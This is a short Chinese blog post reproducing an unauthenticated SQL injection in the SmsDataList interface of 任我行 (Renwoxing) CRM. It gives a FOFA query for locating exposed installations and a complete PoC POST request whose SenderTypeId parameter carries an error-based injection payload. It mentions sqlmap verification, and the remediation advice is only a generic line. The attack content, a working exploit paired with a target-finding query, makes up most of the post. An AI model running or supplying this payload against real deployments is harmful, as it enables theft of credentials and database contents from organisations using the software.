任我行 CRM SQL注入漏洞复现(HW0day)

0x01 产品简介

    任我行CRM(Customer Relationship Management)是一款专业的企业级CRM软件,旨在帮助企业有效管理客户关系、提升销售效率和提供个性化的客户服务。

0x02 漏洞概述

   任我行 CRM SmsDataList 接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。

0x03 复现环境

FOFA:"欢迎使用任我行CRM"

任我行 CRM SQL注入漏洞复现(HW0day)_第1张图片

0x04 漏洞复现

PoC

POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: your-ip

Keywords=&StartSendDate=2020-06-17&EndSendDate=2020-09-17&SenderTypeId=0000000000'and 1=convert(int,(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123456')))) AND 'CvNI'='CvNI

任我行 CRM SQL注入漏洞复现(HW0day)_第2张图片 任我行 CRM SQL注入漏洞复现(HW0day)_第3张图片

sqlmap验证 

任我行 CRM SQL注入漏洞复现(HW0day)_第4张图片

 0x05 修复建议

临时缓解方案

限制访问来源地址,如非必要,不要将系统开放在互联网上。

升级修复方案

升级至安全版本或打补丁!

你可能感兴趣的:(漏洞复现,安全,web安全,网络安全)